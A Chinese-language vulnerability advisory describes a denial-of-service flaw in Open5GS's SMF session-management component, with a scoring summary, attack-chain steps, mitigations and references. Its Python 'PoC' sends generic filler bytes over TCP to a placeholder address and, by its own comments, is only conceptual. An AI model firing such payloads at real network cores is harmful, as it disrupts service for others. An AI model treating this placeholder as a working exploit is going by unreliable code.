CVE-2026-8267 Open5GS SMF拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-8267

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS是一款开源的5G核心网实现。在2.7.7及以下版本中，SMF（会话管理功能）组件的`smf_nsmf_handle_created_data_in_vsmf`函数存在严重缺陷。攻击者可利用该漏洞发起远程攻击，通过发送特制数据包导致目标服务崩溃，从而造成拒绝服务。目前该漏洞利用代码已被公开，且厂商尚未发布修复补丁，风险较高。

技术细节

该漏洞源于Open5GS SMF组件在处理V-SMF（访问会话管理功能）创建的数据时，`smf_nsmf_handle_created_data_in_vsmf`函数未能正确校验输入数据或处理特定异常情况。攻击者无需用户交互，仅需具备低权限，即可通过网络向SMF发送特制的SCTP或HTTP数据包。当SMF尝试解析该恶意构造的数据包时，会触发内部逻辑错误，导致进程异常终止或陷入死循环。由于SMF负责5G核心网中的会话管理，其崩溃将直接导致无法建立PDU会话，严重影响网络服务的可用性。CVSS 3.1向量显示攻击复杂度低，且无需用户交互，这使得漏洞利用门槛较低。鉴于已公开PoC，需立即关注。

攻击链分析

STEP 1

侦察

攻击者扫描网络，寻找暴露的Open5GS SMF组件接口。

STEP 2

漏洞探测

向目标SMF发送特制的探测数据包，验证是否存在smf_nsmf_handle_created_data_in_vsmf函数的处理缺陷。

STEP 3

漏洞利用

攻击者发送精心构造的恶意数据包，利用该逻辑错误触发异常。

STEP 4

拒绝服务

SMF进程崩溃或停止响应，导致5G核心网无法处理新的会话请求，服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# Conceptual Proof of Concept for CVE-2026-8267
# This script attempts to trigger the DoS in Open5GS SMF
# by sending a crafted packet to the vulnerable function.

def trigger_dos(target_ip, target_port):
    print(f"[*] Connecting to {target_ip}:{target_port}...")
    
    try:
        # Create a raw socket or use appropriate protocol socket (e.g., SCTP or HTTP)
        # Assuming standard network communication for demonstration
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, target_port))
        
        # Crafted payload designed to trigger the flaw in smf_nsmf_handle_created_data_in_vsmf
        # The specific bytes would depend on the protocol structure (e.g., NAS, NGAP, or HTTP API)
        # This represents a malformed data structure.
        malicious_payload = b"\x00\x01\x02\x03" * 100 + b"\xFF\xFF\xFF\xFF"
        
        print("[*] Sending malicious payload...")
        sock.send(malicious_payload)
        
        response = sock.recv(1024)
        print(f"[+] Received response (might be empty if crashed): {response}")
        
    except Exception as e:
        print(f"[!] Connection failed or service crashed: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    # Replace with actual target details
    TARGET = "192.168.1.10"
    PORT = 7777 # Example port, actual SMF interface may vary
    trigger_dos(TARGET, PORT)

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

由于厂商目前尚未发布修复补丁，建议采取临时缓解措施：限制对SMF组件的网络访问，仅配置信任的NRF和AMF网元与其通信；利用入侵检测系统（IDS）监控针对SMF接口的异常流量模式；在非高峰时段重启服务以清除潜在的异常状态，但这不是根本解决办法。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8267
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8267
3 Details https://www.cvedetails.com/cve/CVE-2026-8267/
4 VulDB https://vuldb.com/cve/CVE-2026-8267
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4448
7 Link https://vuldb.com/submit/808484
8 Link https://vuldb.com/vuln/362564
9 Link https://vuldb.com/vuln/362564/cti
10 Link https://vuldb.com/submit/808484